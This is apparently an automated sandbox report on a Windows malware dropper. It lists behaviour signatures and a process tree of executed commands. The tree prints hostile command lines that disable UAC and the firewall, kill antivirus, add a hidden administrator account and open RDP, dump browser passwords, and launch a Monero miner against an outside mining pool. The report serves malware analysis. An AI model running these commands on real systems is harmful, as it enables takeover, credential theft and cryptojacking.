Analysis
-
max time kernel
4294207s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20220310-en -
submitted
26-03-2022 03:28
General
-
Target
64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe
-
Size
10.5MB
-
MD5
09da7a0456617a66512a87036aafbb8c
-
SHA1
419bed34eb0b596b593754d49adc54182c684602
-
SHA256
64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b
-
SHA512
2fd8a9e3b7aed71a6570a438d139aeb58ff1367a58cff8e9d62c8f7f51d91545baf02e8ca058346f18a22f83b5fa1c229e8f809d020386a767dcd7935b3e962e
Score
10/10
Malware Config
Signatures
-
Modifies firewall policy service 2 TTPs 8 IoCs
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
UAC bypass 3 TTPs
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 55 IoCs
-
Modifies file permissions 1 TTPs 52 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies WinLogon 2 TTPs 1 IoCs
-
AutoIT Executable 12 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 5 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 12 IoCs
-
Delays execution with timeout.exe 17 IoCs
-
Kills process with taskkill 64 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 6 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe"C:\Users\Admin\AppData\Local\Temp\64946c1fdaad0f24ae883ad9a283af95fd6e9ebd8c3dd0be0819991718f8843b.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\intel\1.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\microsoft\intel\st.bat" "3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
\??\c:\programdata\microsoft\intel\Cheat.exeCheat.exe -p123 -dc:\Programdata\microsoft\intel\4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Programdata\microsoft\intel\D1.exe"C:\Programdata\microsoft\intel\D1.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\1337\D64.exe"C:\Users\Admin\AppData\Roaming\1337\D64.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8382.tmp\8383.bat C:\Users\Admin\AppData\Roaming\1337\D64.exe"7⤵
-
C:\Windows\system32\sc.exesc delete swprv8⤵
-
-
C:\Windows\system32\net.exenet stop MinerGate8⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MinerGate9⤵
-
-
-
C:\Windows\system32\timeout.exetimeout 1 /nobreak8⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\taskkill.exeTASKKILL /IM MBAMService.exe /T /F8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exesc delete MinerGate8⤵
-
-
C:\Windows\system32\net.exenet stop MBAMService8⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService9⤵
-
-
-
C:\Windows\system32\timeout.exetimeout 1 /nobreak8⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMService8⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f8⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f8⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f8⤵
-
-
C:\Windows\system32\cmd.execmd.exe /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8⤵
-
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵
- Modifies registry key
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\1337\D32.exe"C:\Users\Admin\AppData\Roaming\1337\D32.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\84BA.tmp\84CA.bat C:\Users\Admin\AppData\Roaming\1337\D32.exe"7⤵
-
C:\Windows\system32\sc.exesc delete swprv8⤵
-
-
C:\Windows\system32\net.exenet stop MinerGate8⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MinerGate9⤵
-
-
-
C:\Windows\system32\timeout.exetimeout 1 /nobreak8⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc delete MinerGate8⤵
-
-
C:\Windows\system32\taskkill.exeTASKKILL /IM MBAMService.exe /T /F8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net.exenet stop MBAMService8⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService9⤵
-
-
-
C:\Windows\system32\timeout.exetimeout 1 /nobreak8⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc delete MBAMService8⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f8⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f8⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f8⤵
-
-
C:\Windows\system32\cmd.execmd.exe /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8⤵
-
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵
- Modifies registry key
-
-
-
-
-
-
C:\Programdata\microsoft\intel\HClean.exe"C:\Programdata\microsoft\intel\HClean.exe"5⤵
- Executes dropped EXE
-
-
C:\Programdata\microsoft\intel\Temp.exe"C:\Programdata\microsoft\intel\Temp.exe"5⤵
- Executes dropped EXE
-
-
C:\Programdata\microsoft\intel\R.exe"C:\Programdata\microsoft\intel\R.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Log\run.vbs"6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Log\pause.bat" "7⤵
- Loads dropped DLL
-
C:\Log\Rar.exe"Rar.exe" e -p40564203 db.exe8⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\timeout.exetimeout 58⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Log\install.vbs"8⤵
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Log\install.vbs" Run9⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Log\install.bat" "10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state off11⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rutserv.exe11⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rfusclient.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im systemc.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im drivemanag.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im dumprep.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winlogs.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im svnhost.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im svcservice.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\net.exenet stop RManService11⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RManService12⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f11⤵
- Drops file in Drivers directory
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\DEVICEMAP" /f11⤵
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System" /f11⤵
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"11⤵
- Modifies firewall policy service
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
-
-
C:\Folder58\svnhost.exesvnhost.exe /silentinstall11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Folder58\svnhost.exesvnhost.exe /firewall11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s regedit.reg11⤵
- Modifies firewall policy service
- Runs .reg file with regedit
-
-
C:\Folder58\svnhost.exesvnhost.exe /start11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/100011⤵
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own11⤵
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "RManService"11⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout 211⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Folder58\*.*"11⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Folder58"11⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Log"11⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rar.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im rar.exe11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Log\install.vbs" Run9⤵
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Log\install.vbs" Run9⤵
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Log\install.vbs" Run9⤵
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Log\install.vbs" Run9⤵
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Programdata\microsoft\intel\R8.exe"C:\Programdata\microsoft\intel\R8.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\pause.bat" "7⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\rdp\bat.bat" "9⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" "John" /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" "John" /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Programdata\microsoft\intel\MOS.exe"C:\Programdata\microsoft\intel\MOS.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"6⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Programdata\Microsoft\Intel\OS.bat" "7⤵
- Loads dropped DLL
-
\??\c:\Programdata\Microsoft\Intel\Cheat64.exe"c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\ProgramData\System32\Logs\ShellExperienceHost.exeC:\ProgramData\System32\Logs\ShellExperienceHost.exe9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x -t 110⤵
- Loads dropped DLL
-
C:\ProgramData\WindowsTask\MicrosoftShellHost.exeC:\ProgramData\WindowsTask\MicrosoftShellHost.exe -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x -t 111⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
-
C:\Programdata\microsoft\intel\P.exe"C:\Programdata\microsoft\intel\P.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\programdata\microsoft\rootsystem\P.exe"C:\programdata\microsoft\rootsystem\P.exe"6⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt7⤵
- Loads dropped DLL
-
C:\programdata\microsoft\rootsystem\1.exeC:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Programdata\microsoft\intel\CHStart.exe"C:\Programdata\microsoft\intel\CHStart.exe"5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\programdata\microsoft\intel\H.bat6⤵
- Drops file in Drivers directory
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\programdata\microsoft\intel\Clean.bat6⤵
- Deletes itself
-
C:\Windows\SysWOW64\sc.exesc delete swprv7⤵
-
-
C:\Windows\SysWOW64\net.exenet stop MinerGate7⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MinerGate8⤵
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak7⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete MinerGate7⤵
-
-
C:\Windows\SysWOW64\sc.exesc stop MBAMService7⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak7⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\sc.exesc delete MBAMService7⤵
-
-
C:\Windows\SysWOW64\sc.exesc start AppIDSvc7⤵
-
-
C:\Windows\SysWOW64\sc.exesc config AppIDSvc start= Auto7⤵
-
-
C:\Windows\SysWOW64\sc.exesc start AppMgmt7⤵
-
-
C:\Windows\SysWOW64\sc.exesc config AppMgmt start= Auto7⤵
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM CEF.exe /T /F7⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak7⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM CEF.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Cefunpacked\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Cefunpacked\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "Windows System Driver.exe" /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "Windows Driver.exe" /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "COM Surrogate.exe" /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "system.exe" /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM "security.exe" /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1 /nobreak7⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\WindowsSQL\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\WindowsSQL\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DirectX11b\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DirectX11b\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Framework\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Framework\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM AMD.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\AMD\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\AMD\ /deny system:(OI)(CI)(F7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM nssm.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xmarin.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\xmarin\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\xmarin\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM wupdate.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wupdate\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Local\wupdate\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM SIVapp.exe /T /F7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\SIVapp\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\SIVapp\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM Kyubey.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\kyubey\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\kyubey\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM mel.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\QIPapp\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\QIPapp\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM NSCPUCNMINER64.EXE /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM img002.EXE /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\NSCPUCNMINER\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\Roaming\NSCPUCNMINER\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM monotype.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\monotype\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\monotype\ /deny system:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM xpon.exe /T /F7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\users\Admin\AppData\local\xpon\ /deny Admin:(OI)(CI)(F)7⤵
- Modifies file permissions
-
-
